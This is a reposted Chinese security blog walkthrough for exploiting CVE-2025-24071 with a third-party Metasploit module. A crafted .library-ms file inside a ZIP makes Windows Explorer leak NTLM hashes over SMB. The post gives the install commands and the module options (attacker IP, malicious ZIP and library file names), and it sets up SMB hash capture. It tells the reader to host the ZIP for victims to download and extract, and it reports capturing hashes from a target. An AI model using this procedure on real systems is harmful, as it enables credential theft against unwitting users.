Metasploit 利用CVE-2025-24071(NTLM Hash Leak via .library-ms File)

admin 2025年3月21日10:57:33评论44 views字数 1281阅读4分16秒阅读模式

msf漏洞利用脚本获取地址在文章末尾

CVE-2025-24071:通过 .library-ms 文件(Metasploit 模块)导致 NTLM 哈希泄漏
该存储库包含一个Metasploit 模块,用于利用 CVE-2025-24071,这是 Windows 资源管理器中的一个漏洞,当.library-ms从 ZIP 存档中提取恶意文件时,它会泄露 NTLM 哈希。
开发者:FOLKS-IWD

概述

该漏洞发生在用户提取包含特制.library-ms文件的 ZIP 存档时。Windows 资源管理器会自动向文件中指定的远程服务器发起 SMB 身份验证请求,从而在无需任何用户交互的情况下泄露用户的 NTLM 哈希。

此 Metasploit 模块:

  1. 生成恶意.library-ms文件。
  2. 将其打包成 ZIP 档案。
  3. 与 Metasploit 的 SMB 捕获功能集成以收集 NTLM 哈希。

安装

1.克隆存储库:
git clone https://github.com/FOLKS-IWD/CVE-2025-24071-msfvenom.gitcd CVE-2025-24071-msfvenom
2.将模块复制到您的 Metasploit 模块目录:
cp ntlm_hash_leak.rb ~/.msf4/modules/auxiliary/server/
我的kali环境是复制到这里
cp ntlm_hash_leak.rb /usr/share/metasploit-framework/modules/auxiliary/server 

用法

1.加载模块:
use auxiliary/server/ntlm_hash_leak
2.设置所需选项:
set ATTACKER_IP 192.168.1.162  # Replace with your IP addressset FILENAME exploit.zip       # Name of the malicious ZIP fileset LIBRARY_NAME malicious.library-ms  # Name of the .library-ms fileset SHARE_NAME shared          # SMB share name
3.运行模块:
  run
4.该模块将生成一个恶意的ZIP文件(exploit.zip)。将此文件托管给受害者以供下载和解压。
5.使用 Metasploit 的 SMB 捕获模块收集 NTLM 哈希
use auxiliary/server/capture/smbset SRVHOST 192.168.1.162  # Same as ATTACKER_IPrun
复现:
首先生成一个恶意的zip压缩包
Metasploit 利用CVE-2025-24071(NTLM Hash Leak via .library-ms File)
开机msf的监听
Metasploit 利用CVE-2025-24071(NTLM Hash Leak via .library-ms File)
将zip传到目标机器上,解压打开,我这里使用的是使用7z解压,Windows自带的解压实测也可以
Metasploit 利用CVE-2025-24071(NTLM Hash Leak via .library-ms File)
然后打开这个文件夹
Metasploit 利用CVE-2025-24071(NTLM Hash Leak via .library-ms File)
kali这边收到hash
Metasploit 利用CVE-2025-24071(NTLM Hash Leak via .library-ms File)
一共收到8次hash
Metasploit 利用CVE-2025-24071(NTLM Hash Leak via .library-ms File)
Metasploit 利用CVE-2025-24071(NTLM Hash Leak via .library-ms File)

工具获取,后台回复【CVE-2025-24071

更多精彩文章与工具分享 欢迎关注

原文始发于微信公众号(爱坤sec):Metasploit 利用CVE-2025-24071(NTLM Hash Leak via .library-ms File)

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2025年3月21日10:57:33
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   Metasploit 利用CVE-2025-24071(NTLM Hash Leak via .library-ms File)https://cn-sec.com/archives/3859964.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息